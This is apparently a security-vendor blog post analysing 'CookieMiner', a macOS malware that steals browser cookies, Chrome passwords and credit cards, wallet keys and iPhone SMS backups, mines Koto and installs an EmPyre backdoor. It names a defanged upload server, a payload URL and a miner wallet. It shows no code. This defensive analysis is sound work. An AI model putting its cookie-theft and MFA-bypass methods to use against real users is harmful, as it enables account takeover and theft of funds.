This post is also available in: 日本語 (Japanese)
Palo Alto Networks’ Unit 42 recently discovered malware that we believe has been developed from OSX.DarthMiner, a malware known to target the Mac platform.
This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.
It also steals saved passwords in Chrome.
Finally, it seeks to steal iPhone text messages from iTunes backups on the tethered Mac.
By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites.
If successful, the attackers would have full access to the victim’s exchange account and/or wallet and be able to use those funds as if they were the user themselves.
The malware also configures the system to load coinmining software on the system. This software is made to look like an XMRig-type coinminer, which is used to mine Monero. In fact, though, it loads a coinminer that mines Koto, a lesser-known cryptocurrency that is associated with Japan.
Because of the way this malware attacks the cookies associated with exchanges, we have named this malware “CookieMiner”.
In the following sections, we will first briefly introduce some background knowledge, and then dig into the technical details of the malware’s behaviors.
Web cookies are widely used for authentication. Once a user logs into a website, its cookies are stored for the web server to know the login status. If the cookies are stolen, the attacker could potentially sign into the website to use the victim’s account. Stealing cookies is an important step to bypass login anomaly detection. If only the username and password are stolen and used by a bad actor, the website may issue an alert or request additional authentication for a new login. However, if an authentication cookie is also provided along with the username and password, the website might believe the session is associated with a previously authenticated system host and not issue an alert or request additional authentication methods.
A cryptocurrency exchange is a place to trade cryptocurrencies for other assets, such as other digital (crypto)currencies or conventional fiat money. Most modern cryptocurrency exchanges and online wallet services have multi-factor authentication. CookieMiner tries to navigate past the authentication process by stealing a combination of the login credentials, text messages, and web cookies. If the bad actors successfully enter the websites using the victim’s identity, they could perform fund withdrawals. This may be a more efficient way to generate profits than outright cryptocurrency mining. Furthermore, attackers could manipulate the cryptocurrency prices with large-volume buying and/or selling of stolen assets resulting in additional profits.
A rundown of CookieMiner’s behaviors (discussed in more detail in the following sections):
- Steals Google Chrome and Apple Safari browser cookies from the victim’s machine
- Steals saved usernames and passwords in Chrome
- Steals saved credit card credentials in Chrome
- Steals iPhone’s text messages if backed up to Mac
- Steals cryptocurrency wallet data and keys
- Keeps full control of the victim using the EmPyre backdoor
- Mines cryptocurrency on the victim’s machine
The CookieMiner attack begins with a shell script targeting MacOS. As shown in Figure 1, it copies the Safari browser’s cookies to a folder, and uploads it to a remote server (46.226.108[.]171:8000). The server hosts the service “curldrop” (https://github[.]com/kennell/curldrop), which allows users to upload files with curl. The attack targets cookies associated with cryptocurrency exchanges that include Binance, Coinbase, Poloniex, Bittrex, Bitstamp, MyEtherWallet, and any website having “blockchain” in its domain name such as www.blockchain[.]com.
Figure 1. Code to steal web cookies
Stealing Credit Cards, Passwords, Wallets and SMS
Apple’s Safari is not the only web browser targeted. Google Chrome also attracts the threat actors’ attention due to its popularity. CookieMiner downloads a Python script named “harmlesslittlecode.py” to extract saved login credentials and credit card information from Chrome’s local data storage (Figure 2).
Figure 2. Malware extracts Chrome's secret data
CookieMiner adopts techniques from the Google Chromium project’s code for its decryption and extraction operations and abuses them. Google Chromium is an open-source version of the Google Chrome browser. By abusing these techniques, CookieMiner attempts to steal credit card information from major issuers, such as Visa, Mastercard, American Express, and Discover (Figure 3). The user’s saved login credentials are also stolen, including usernames, passwords, and the corresponding web URLs (Figure 4).
Figure 3. CookieMiner extracts credit card information
Figure 4. CookieMiner extracts login credentials
CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5).
Figure 5. Malware steals wallets, cookies, passwords and SMS
CookieMiner issues a series of commands to configure the victim’s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address “k1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H” has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work). The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The has addresses in Figure 8 use the “Yescrypt” algorithm which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. However, the filename xmrig2 is usually used by Monero miners. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency.
Figure 6. CookieMiner mines cryptocurrency
Figure 7 Mining performance of the worker
For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture. The attacker is able to send commands to the victim’s machine for remote control. Additionally, the agent checks if Little Snitch (an application firewall) is running on the victim’s host. If so, it will stop and exit.
The malware “CookieMiner” is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated. Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.
Indicators of Compromise